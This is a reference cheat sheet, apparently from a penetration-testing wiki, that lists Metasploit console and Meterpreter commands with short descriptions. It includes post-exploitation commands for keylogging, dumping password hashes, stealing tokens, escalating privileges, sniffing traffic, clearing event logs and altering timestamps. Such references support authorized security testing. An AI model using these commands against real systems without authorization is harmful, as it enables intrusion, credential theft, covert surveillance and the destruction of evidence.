Using The Metasploit Framework

MSFconsole Commands

Show all exploits:

show exploits

Show all payloads:

show payloads

Show all auxiliary modules:

show auxiliary

Search for a module:

search <name>

Load information about a specific module:

info

Load an exploit or module:

use <name>

Load an exploit by index number:

use <number>

Set Local Host IP (LHOST):

set LHOST <ip>

Set Remote Host IP (RHOST):

set RHOST <ip>

Set a specific option value:

set <option> <value>

Set a global option value:

setg <option> <value>

Display available options for a module:

show options

Display supported platforms for the exploit:

show targets

Specify the target index:

set target <number>

Set the desired payload:

set payload <payload>

Display advanced options for a module:

show advanced

Automatically migrate to another process after exploitation:

set autorunscript migrate -f

Check if a target is vulnerable:

check

Execute the module or exploit:

exploit

Run the exploit in the background:

exploit -j

Run without interacting with the session:

exploit -z

Specify a payload encoder:

exploit -e <encoder>

Display help for the exploit command:

exploit -h

List available sessions:

sessions -l

List sessions with verbose details:

sessions -v

Run a script on all live sessions:

sessions -s <script>

Kill all active sessions:

sessions -K

Run a command across all sessions:

sessions -c <cmd>

Upgrade a shell to a Meterpreter session:

sessions -u <sessionID>

Create a new database:

db_create <name>

Connect to an existing database:

db_connect <name>

Use Nmap and store results in the database:

db_nmap <args>

Delete the current database:

db_destroy

Meterpreter Commands

Display Meterpreter help:

help

Run a Meterpreter script:

run <scriptname>

Show target system information:

sysinfo

List files and directories:

ls

Load the privilege extension:

use priv

List running processes:

ps

Migrate to a specific process by ID:

migrate <pid>

Load incognito functions:

use incognito

List user tokens:

list_tokens -u

List group tokens:

list_tokens -g

Impersonate a token:

impersonate_token <DOMAIN\\USERNAME>

Steal a process token:

steal_token <pid>

Stop token impersonation:

drop_token

Attempt privilege escalation to SYSTEM:

getsystem

Drop into an interactive shell:

shell

Run a command interactively:

execute -f <cmd.exe> -i

Revert to the original user:

rev2self

Interact with the registry:

reg <command>

Switch to another desktop:

setdesktop <number>

Capture a screenshot:

screenshot

Upload a file to the target:

upload <file>

Download a file from the target:

download <file>

Start keylogging:

keyscan_start

Dump captured keystrokes:

keyscan_dump

Stop keylogging:

keyscan_stop

Get available privileges:

getprivs

Take control of input devices:

uictl enable <keyboard/mouse>

Background the current session:

background

Dump password hashes:

hashdump

Load the sniffer module:

use sniffer

List network interfaces:

sniffer_interfaces

Start sniffing on an interface:

sniffer_start <id> <packet-buffer>

Dump captured packets:

sniffer_dump <id> <filename>

Stop packet sniffing:

sniffer_stop <id>

Clear event logs:

clearev

Modify file timestamps:

timestomp

Reboot the target machine:

reboot

PreviousUpgrading TTY Shell NextLigolo-ng

Last updated 17 days ago

hashtagMSFconsole Commands

hashtagMeterpreter Commands

MSFconsole Commands

Meterpreter Commands